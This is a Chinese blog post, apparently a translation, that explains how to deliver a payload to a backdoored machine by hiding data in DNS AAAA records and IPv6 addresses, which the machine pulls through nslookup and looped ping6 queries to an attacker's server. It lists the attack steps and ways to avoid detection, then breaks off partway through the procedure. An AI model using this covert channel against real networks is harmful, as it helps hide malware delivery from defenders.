利用DNS AAAA记录和IPv6地址传输后门

本文详细介绍了如何通过DNS AAAA记录和ICMPv6进行Payload传输,利用IPv6地址的特殊性在DNS流量中隐藏数据。作者通过两部分展示了如何设置DNS服务器,创建AAAA记录,以及如何利用Ping6响应来提取Payload。同时,文章讨论了如何避免被检测,包括使用多个IPv6地址和DNS轮询。最后,提到了相关工具的C#源代码链接。
摘要由CSDN通过智能技术生成

利用DNS AAAA记录和IPv6地址传输后门

一、前言

在本文中,我想解释如何在DNS流量中利用IPv6地址(AAAA)记录传输Payload。在我之前的文章中,我解释了如何利用DNS和PTR记录,现在我们将讨论AAAA记录。

本文分为两部分:

  • 第一部分:DNS AAAA记录和ICMPv6
  • 第二部分:DNS和AAAA记录(大的DNS AAAA记录响应)

二、DNS AAAA记录和ICMPv6

IPv6地址对于传输Payload非常有用,让我解释下如何完成这个例子。

举个例子,我们有一个IPv6地址如下:

 
 
  1. fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 

这个例子中,我们能将xxxx部分用于我们的Payload。

 
 
  1. fe80:1111:xxxx:xxxx:xxxx:xxxx:xxxx:wxyz 

我认为我们有两种方式将IPv6地址用于我们的Payload,第一个是我们使用DNS和AAAA记录,第二个是使用这些IPv6地址和DNS AAAA记录,也是Ping6的ICMPv6流量。

ICMPv6和Ping6:这个例子中,你能通过虚假的IPv6和注入的Payload来改变攻击者的IPv6地址,然后从后门系统中,你能通过循环Ping6得到这些IPv6地址(ICMPv6流量)。

因此我们有下面这些东西:

  • (后门系统)ip地址 = {192.168.1.120}
  • (攻击者系统)ip地址 = {192.168.1.111
  • ,fe80:1111:0034:abcd:ef00:ab11:ccf1:0000}
  • (攻击者系统)DNS名 = test.domain.com,和安装的DNS服务{dnsmasq或dnsspoof}

DNS AAAA记录和ICMPv6步骤:

步骤1:(攻击者DNS服务器)record0=>fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 AAAA test.domain.com

步骤2:(后门系统)==>nslookup test.server.com 192.168.1.111

步骤3:(后门系统)循环Ping6=>(攻击者系统fe80:1111:0034:abcd:ef00:ab11:ccf1:0000)

步骤4:(后门系统)通过Ping6响应在IPv6地址中转储出注入的Payload,转储这些部分{0034:abcd:ef00:ab11:ccf1}

步骤5:(攻击者DNS服务器)record0改为新的test.domain.com

步骤6:(攻击者DNS服务器)record0=>fe80:1111:cf89:abff:000e:09b1:33b1:0001 AAAA test.domain.com

步骤6-1:(攻击者系统)通过ifconfig添加或改变NIC IPv6地址{新的IPv6地址:fe80:1111:cf89:abff:000e:09b1:33b1:0001}

步骤6-2:关于步骤3的ping6的响应=超时或不可达(错误),这个时间是获取新的IPv6地址的标志,或者你的流量被某些东西检测到并阻止了。

步骤7:(后门系统)=>nslookup test.ser

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值